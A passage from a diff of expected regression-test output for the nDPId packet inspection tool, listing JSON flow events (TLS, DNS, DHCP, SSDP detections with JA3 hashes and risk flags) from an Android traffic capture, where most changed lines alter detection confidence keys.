{"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1582454871920,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1582454871920,"pkt":"TGr2n\/YnxiwDYGpkCABFAABUFXQAAEAR38PAqAIBwKgCEAA1m1AAQNQ0uKWBgAABAAEAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARcABKzZFgo="} 
-00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454871920,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.10"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454871920,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.10"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871947,"flow_last_seen":1582454871947,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871947,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1582454871947,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871947,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8i1NAAEAGKc3AqAIQrNkWCq1WAbtFj7zOAAAAAKAC\/\/\/ZVgAAAgQFtAQCCAr\/\/zedAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1582454871972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871972,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8OOwAAHYGhjSs2RYKwKgCEAG7rVbtvX7+RY+8z6AS6yDuawAAAgQFZAQCCAq7R9gE\/\/83nQEDAwg="} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1582454871974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871974,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0i1RAAEAGKdTAqAIQrNkWCq1WAbtFj7zP7b1+\/4AQAVcGrAAAAQEICv\/\/N6S7R9gE"} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1582454872021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454872021,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrFBAAEARCPrAqAIQwKgCAdv4ADUALYKcD\/4BAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": 
{"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1582454872022,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454872022,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRBMwAAEAR8G7AqAIBwKgCEAA12\/gAPTZ5D\/6BgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872022,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872022,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1582454872031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454872031,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8+JhAAEAGvkXAqAIQrNkUTKqEAbsc\/M8rAAAAAKAC\/\/\/0BgAAAgQFtAQCCAr\/\/zezAAAAAAEDAwg="} -01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454784313,"flow_last_seen":1582454866536,"flow_idle_time":200000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3584,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS 
